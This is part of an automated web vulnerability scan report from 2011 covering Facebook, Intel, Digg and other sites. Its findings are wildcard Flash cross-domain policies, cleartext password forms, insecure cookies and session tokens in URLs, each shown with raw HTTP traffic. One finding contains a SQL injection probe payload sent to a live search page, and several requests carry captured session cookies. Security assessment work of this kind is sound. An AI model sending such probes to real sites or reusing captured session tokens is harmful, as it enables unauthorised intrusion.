<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.ac"/>
<allow-access-from domain="*.ad"/>
<allow-access-from domain="*.ae"/>
<allow-access-from domain="*.aero"/>
<allow-access-from domain="*.af"/>
<allow-access-from domain="*.ag"/>
<allow-access-from domain="*.ai"/>
<allow-access-from domain="*.al"/>
<allow-access-from domain="*.am"/>
<allow-access-from domain="*.an"/>
<allow-access-from domain="*.ao"/>
<allow-access-from domain="*.aq"/>
<allow-access-from domain="*.ar"/>
<allow-access-from domain="*.arpa"/>
<allow-access-from domain="*.as"/>
<allow-access-from domain="*.asia"/>
<allow-access-from domain="*.at"/>
<allow-access-from domain="*.au"/>
<allow-access-from domain="*.aw"/>
<allow-access-from domain="*.ax"/>
<allow-access-from domain="*.az"/>
<allow-access-from domain="*.ba"/>
<allow-access-from domain="*.bb"/>
<allow-access-from domain="*.bd"/>
<allow-access-from domain="*.be"/>
<allow-access-from domain="*.bf"/>
<allow-access-from domain="*.bg"/>
<allow-access-from domain="*.bh"/>
<allow-access-from domain="*.bi"/>
<allow-access-from domain="*.biz"/>
<allow-access-from domain="*.bj"/>
<allow-access-from domain="*.bm"/>
<allow-access-from domain="*.bn"/>
<allow-access-from domain="*.bo"/>
<allow-access-from domain="*.br"/>
<allow-access-from domain="*.bs"/>
<allow-access-from domain="*.bt"/>
<allow-access-from domain="*.bw"/>
<allow-access-from domain="*.by"/>
<allow-access-from domain="*.bz"/>
<allow-access-from domain="*.ca"/>
<allow-access-from domain="*.cat"/>
<allow-access-from domain="*.cc"/>
<allow-access-from domain="*.cd"/>
<allow-access-from domain="*.cf"/>
<allow-access-from domain="*.cg"/>
<allow-access-from domain="*.ch"/>
<allow-access-from domain="*.ci"/>
<allow-access-from domain="*.ck"/>
<allow-access-from domain="*.cl"/>
<allow-access-from domain="*.cm"/>
<allow-access-from domain="*.cn"/>
<allow-access-from domain="*.co"/>
<allow-access-from domain="*.com"/>
<allow-access-from domain="*.coop"/>
<allow-access-from domain="*.cr"/>
<allow-access-from domain="*.cu"/>
<allow-access-from domain="*.cv"/>
<allow-access-from domain="*.cx"/>
<allow-access-from domain="*.cy"/>
<allow-access-from domain="*.cz"/>
<allow-access-from domain="*.de"/>
<allow-access-from domain="*.dj"/>
<allow-access-from domain="*.dk"/>
<allow-access-from domain="*.dm"/>
<allow-access-from domain="*.do"/>
<allow-access-from domain="*.dz"/>
<allow-access-from domain="*.ec"/>
<allow-access-from domain="*.edu"/>
<allow-access-from domain="*.ee"/>
<allow-access-from domain="*.eg"/>
<allow-access-from domain="*.er"/>
<allow-access-from domain="*.es"/>
<allow-access-from domain="*.et"/>
<allow-access-from domain="*.eu"/>
<allow-access-from domain="*.fi"/>
<allow-access-from domain="*.fj"/>
<allow-access-from domain="*.fk"/>
<allow-access-from domain="*.fm"/>
<allow-access-from domain="*.fo"/>
<allow-access-from domain="*.fr"/>
<allow-access-from domain="*.ga"/>
<allow-access-from domain="*.gd"/>
<allow-access-from domain="*.ge"/>
<allow-access-from domain="*.gf"/>
<allow-access-from domain="*.gg"/>
<allow-access-from domain="*.gh"/>
<allow-access-from domain="*.gi"/>
<allow-access-from domain="*.gl"/>
<allow-access-from domain="*.gm"/>
<allow-access-from domain="*.gn"/>
<allow-access-from domain="*.gov"/>
<allow-access-from domain="*.gp"/>
<allow-access-from domain="*.gq"/>
<allow-access-from domain="*.gr"/>
<allow-access-from domain="*.gs"/>
<allow-access-from domain="*.gt"/>
<allow-access-from domain="*.gu"/>
<allow-access-from domain="*.gw"/>
<allow-access-from domain="*.gy"/>
<allow-access-from domain="*.hk"/>
<allow-access-from domain="*.hm"/>
<allow-access-from domain="*.hn"/>
<allow-access-from domain="*.hr"/>
<allow-access-from domain="*.ht"/>
<allow-access-from domain="*.hu"/>
<allow-access-from domain="*.id"/>
<allow-access-from domain="*.ie"/>
<allow-access-from domain="*.il"/>
<allow-access-from domain="*.im"/>
<allow-access-from domain="*.in"/>
<allow-access-from domain="*.info"/>
<allow-access-from domain="*.int"/>
<allow-access-from domain="*.io"/>
<allow-access-from domain="*.iq"/>
<allow-access-from domain="*.ir"/>
<allow-access-from domain="*.is"/>
<allow-access-from domain="*.it"/>
<allow-access-from domain="*.je"/>
<allow-access-from domain="*.jm"/>
<allow-access-from domain="*.jo"/>
<allow-access-from domain="*.jobs"/>
<allow-access-from domain="*.jp"/>
<allow-access-from domain="*.ke"/>
<allow-access-from domain="*.kg"/>
<allow-access-from domain="*.kh"/>
<allow-access-from domain="*.ki"/>
<allow-access-from domain="*.km"/>
<allow-access-from domain="*.kn"/>
<allow-access-from domain="*.kr"/>
<allow-access-from domain="*.kw"/>
<allow-access-from domain="*.ky"/>
<allow-access-from domain="*.kz"/>
<allow-access-from domain="*.la"/>
<allow-access-from domain="*.lb"/>
<allow-access-from domain="*.lc"/>
<allow-access-from domain="*.li"/>
<allow-access-from domain="*.lk"/>
<allow-access-from domain="*.local"/>
<allow-access-from domain="*.lr"/>
<allow-access-from domain="*.ls"/>
<allow-access-from domain="*.lt"/>
<allow-access-from domain="*.lu"/>
<allow-access-from domain="*.lv"/>
<allow-access-from domain="*.ly"/>
<allow-access-from domain="*.ma"/>
<allow-access-from domain="*.mc"/>
<allow-access-from domain="*.md"/>
<allow-access-from domain="*.me"/>
<allow-access-from domain="*.mg"/>
<allow-access-from domain="*.mh"/>
<allow-access-from domain="*.mil"/>
<allow-access-from domain="*.mk"/>
<allow-access-from domain="*.ml"/>
<allow-access-from domain="*.mm"/>
<allow-access-from domain="*.mn"/>
<allow-access-from domain="*.mo"/>
<allow-access-from domain="*.mobi"/>
<allow-access-from domain="*.mp"/>
<allow-access-from domain="*.mq"/>
<allow-access-from domain="*.mr"/>
<allow-access-from domain="*.ms"/>
<allow-access-from domain="*.mt"/>
<allow-access-from domain="*.mu"/>
<allow-access-from domain="*.museum"/>
<allow-access-from domain="*.mv"/>
<allow-access-from domain="*.mw"/>
<allow-access-from domain="*.mx"/>
<allow-access-from domain="*.my"/>
<allow-access-from domain="*.mz"/>
<allow-access-from domain="*.na"/>
<allow-access-from domain="*.name"/>
<allow-access-from domain="*.nc"/>
<allow-access-from domain="*.ne"/>
<allow-access-from domain="*.net"/>
<allow-access-from domain="*.nf"/>
<allow-access-from domain="*.ng"/>
<allow-access-from domain="*.ni"/>
<allow-access-from domain="*.nl"/>
<allow-access-from domain="*.no"/>
<allow-access-from domain="*.np"/>
<allow-access-from domain="*.nr"/>
<allow-access-from domain="*.nu"/>
<allow-access-from domain="*.nz"/>
<allow-access-from domain="*.om"/>
<allow-access-from domain="*.org"/>
<allow-access-from domain="*.pa"/>
<allow-access-from domain="*.pe"/>
<allow-access-from domain="*.pf"/>
<allow-access-from domain="*.pg"/>
<allow-access-from domain="*.ph"/>
<allow-access-from domain="*.pk"/>
<allow-access-from domain="*.pl"/>
<allow-access-from domain="*.pn"/>
<allow-access-from domain="*.pr"/>
<allow-access-from domain="*.pro"/>
<allow-access-from domain="*.ps"/>
<allow-access-from domain="*.pt"/>
<allow-access-from domain="*.pw"/>
<allow-access-from domain="*.py"/>
<allow-access-from domain="*.qa"/>
<allow-access-from domain="*.re"/>
<allow-access-from domain="*.ro"/>
<allow-access-from domain="*.rs"/>
<allow-access-from domain="*.ru"/>
<allow-access-from domain="*.rw"/>
<allow-access-from domain="*.sa"/>
<allow-access-from domain="*.sb"/>
<allow-access-from domain="*.sc"/>
<allow-access-from domain="*.sd"/>
<allow-access-from domain="*.se"/>
<allow-access-from domain="*.sg"/>
<allow-access-from domain="*.sh"/>
<allow-access-from domain="*.si"/>
<allow-access-from domain="*.sk"/>
<allow-access-from domain="*.sl"/>
<allow-access-from domain="*.sm"/>
<allow-access-from domain="*.sn"/>
<allow-access-from domain="*.sr"/>
<allow-access-from domain="*.st"/>
<allow-access-from domain="*.su"/>
<allow-access-from domain="*.sv"/>
<allow-access-from domain="*.sy"/>
<allow-access-from domain="*.sz"/>
<allow-access-from domain="*.tc"/>
<allow-access-from domain="*.td"/>
<allow-access-from domain="*.tel"/>
<allow-access-from domain="*.tf"/>
<allow-access-from domain="*.tg"/>
<allow-access-from domain="*.th"/>
<allow-access-from domain="*.tj"/>
<allow-access-from domain="*.tk"/>
<allow-access-from domain="*.tl"/>
<allow-access-from domain="*.tm"/>
<allow-access-from domain="*.tn"/>
<allow-access-from domain="*.to"/>
<allow-access-from domain="*.tr"/>
<allow-access-from domain="*.travel"/>
<allow-access-from domain="*.tt"/>
<allow-access-from domain="*.tv"/>
<allow-access-from domain="*.tw"/>
<allow-access-from domain="*.tz"/>
<allow-access-from domain="*.ua"/>
<allow-access-from domain="*.ug"/>
<allow-access-from domain="*.uk"/>
<allow-access-from domain="*.us"/>
<allow-access-from domain="*.uy"/>
<allow-access-from domain="*.uz"/>
<allow-access-from domain="*.va"/>
<allow-access-from domain="*.vc"/>
<allow-access-from domain="*.ve"/>
<allow-access-from domain="*.vg"/>
<allow-access-from domain="*.vi"/>
<allow-access-from domain="*.vn"/>
<allow-access-from domain="*.vu"/>
<allow-access-from domain="*.ws"/>
<allow-access-from domain="*.ye"/>
<allow-access-from domain="*.yu"/>
<allow-access-from domain="*.za"/>
<allow-access-from domain="*.zm"/>
<allow-access-from domain="*.zw"/>
<allow-access-from domain="localhost"/>
<allow-access-from domain="127.0.0.1"/>
...[SNIP]...

5.3. http://www.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
Connection: close
Content-Length: 1581

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.thefacebook.com" />
   <allow-access-from domain="*.static.ak.fbcdn.com" />
   <allow-access-from domain="external.ak.fbcdn.com" />
   <allow-access-from domain="*.static.ak.fbcdn.net" />
   <allow-access-from domain="external.ak.fbcdn.net" />
...[SNIP]...
<allow-access-from domain="www.new.facebook.com" />
   <allow-access-from domain="register.facebook.com" />
   <allow-access-from domain="login.facebook.com" />
   <allow-access-from domain="ssl.facebook.com" />
   <allow-access-from domain="secure.facebook.com" />
   <allow-access-from domain="ssl.new.facebook.com" />
   <allow-access-from domain="static.ak.fbcdn.net" />
   <allow-access-from domain="fvr.facebook.com" />
   <allow-access-from domain="s-static.ak.facebook.com" />
   <allow-access-from domain="www.latest.facebook.com" />
   <allow-access-from domain="www.inyour.facebook.com" />
   <allow-access-from domain="s-static.ak.fbcdn.net" />
...[SNIP]...

5.4. http://www.intel.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.intel.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.intel.com

Response

HTTP/1.0 200 OK
Content-Length: 290
Content-Type: text/xml
Last-Modified: Tue, 10 Jan 2006 16:04:48 GMT
Accept-Ranges: bytes
ETag: "78bab694ff15c61:4299"
Server: IA Web Server
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
Date: Sat, 05 Feb 2011 23:13:36 GMT
Connection: close

...<?xml version="1.0" encoding="UTF-8" ?>
<cross-domain-policy>
<allow-access-from domain="*.spillinova.com" />
<allow-access-from domain="*.intel.com" />
<allow-access-from domain="*.intel.com/cd/" />
<allow-access-from domain = "intel.speedera.net"/>
...[SNIP]...

6. Cleartext submission of password  previous  next
There are 4 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defense and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


6.1. http://digg.com/submit  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /submit?url= HTTP/1.1
Host: digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Set-Cookie: traffic_control=1458898097449992448%3A180; expires=Sun, 06-Feb-2011 23:17:38 GMT; path=/; domain=digg.com
Set-Cookie: d=15436670eec4b706dbd3007684ea2ebb76af60eb4cc681ce1bc0e799ee3bcc18; expires=Fri, 05-Feb-2021 09:25:18 GMT; path=/; domain=.digg.com
X-Digg-Time: D=21375 10.2.129.225
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7633

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>Digg
- Submit a link
</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics
...[SNIP]...
</script><form class="hidden">
<input type="text" name="ident" value="" id="ident-saved">
<input type="password" name="password" value="" id="password-saved">
</form>
...[SNIP]...

6.2. http://www.ericmmartin.com/projects/simplemodal/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ericmmartin.com
Path:   /projects/simplemodal/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /projects/simplemodal/ HTTP/1.1
Host: www.ericmmartin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:17:13 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Expires: Thu, 19 Nov 1981 08:52:00 GMT
X-Pingback: http://www.ericmmartin.com/wordpress/xmlrpc.php
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sat, 05 Feb 2011 20:00:09 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33772


<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

<title>SimpleModal / Eric Martin / ericmmartin.com</title>

<meta name="author" content="Eric Ma
...[SNIP]...
<div id="simplemodal-login-form" style="display:none">
   <form name="loginform" id="loginform" action="http://www.ericmmartin.com/wordpress/wp-login.php" method="post">
       <div class="title">
...[SNIP]...
<br />
           <input type="password" name="pwd" class="user_pass input" value="" size="20" tabindex="20" /></label>
...[SNIP]...

6.3. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/distributor/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G08
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:36 GMT
Date: Sat, 05 Feb 2011 23:18:36 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 35633

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content-Type" content="text/html; charset=utf-8">
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

6.4. http://www.intel.com/cd/channel/reseller/asmo-na/eng/index.htm  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.intel.com
Path:   /cd/channel/reseller/asmo-na/eng/index.htm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /cd/channel/reseller/asmo-na/eng/index.htm HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
Z: G15
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Content-Type: text/html
Cache-Control: no-cache
Expires: Sat, 05 Feb 2011 23:18:29 GMT
Date: Sat, 05 Feb 2011 23:18:29 GMT
Connection: close
Connection: Transfer-Encoding
Vary: Accept-Encoding
Vary: Accept-Encoding
Content-Length: 47184

...<html xmlns:wsml="urn:org:wsml:2003:html" xmlns:cd="urn:schemas-microsoft-com:xslt" xmlns:str="http://exslt.org/strings" xmlns:msxsl="urn:schemas-microsoft-com:xslt"><head><META http-equiv="Content
...[SNIP]...
<div id="hptopwhite"><form id="Form1" method="post" name="Form1"><table cellpadding="0" cellspacing="0" border="0" width="95%" align="center">
...[SNIP]...
<td><input size="26" class="text" id="txtPassword" onkeydown="if(event.keyCode==13) javascript:rememberme_check(param_a,param_b);" type="password" name="txtPassword"></td>
...[SNIP]...

7. SQL statement in request parameter  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://www.freedownloadscenter.com
Path:   /Search/newsearch.php3

Issue description

The request appears to contain SQL syntax. If this is incorporated into a SQL query and executed by the server, then the application is almost certainly vulnerable to SQL injection.

You should verify whether the request contains a genuine SQL query and whether this is being executed by the server.

Issue remediation

The application should not incorporate any user-controllable data directly into SQL queries. Parameterised queries (also known as prepared statements) should be used to safely insert data into predefined queries. In no circumstances should users be able to control or modify the structure of the SQL query itself.

Request

GET /Search/newsearch.php3?Category=(select+convert(int,CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))+FROM+syscolumns)&Go=Go!&S_S=3 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.freedownloadscenter.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Date: Sat, 05 Feb 2011 23:23:15 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 647
Keep-Alive: timeout=15, max=500

<br />
<b>Warning</b>: file(http://www.freedownloadscenter.com/mybeta/Search/newsearch.php3?q=3&amp;Category=(select convert(int,CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR
...[SNIP]...

8. SSL cookie without secure flag set  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure-newsroom.intel.com
Path:   /cs_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /cs_login HTTP/1.1
Host: secure-newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 05 Feb 2011 23:16:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=A4CC37F1E2D36D9C40FE66EF20991E8D.node7IPR; Domain=.intel.com; Path=/
Set-Cookie: ACEGI_SECURITY_HASHED_REMEMBER_ME_COOKIE=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
X-JAL: 0
Location: https://secure-newsroom.intel.com/login.jspa
Content-Length: 0
CacheHit: D=2495 t=1296947795404257
X-JSL: D=2500 t=1296947795404257
Connection: close
Content-Type: text/plain; charset=UTF-8


9. Session token in URL  previous  next
There are 3 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


9.1. http://www.intel.com/cd/channel/distributor/asmo-na/eng/index.htm  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.intel.com
Path:   /cd/channel/distributor/asmo-na/eng/index.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /cd/channel/distributor/asmo-na/eng/index.htm?iid=subhdr+ptr_chan_disti HTTP/1.1
Host: www.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; 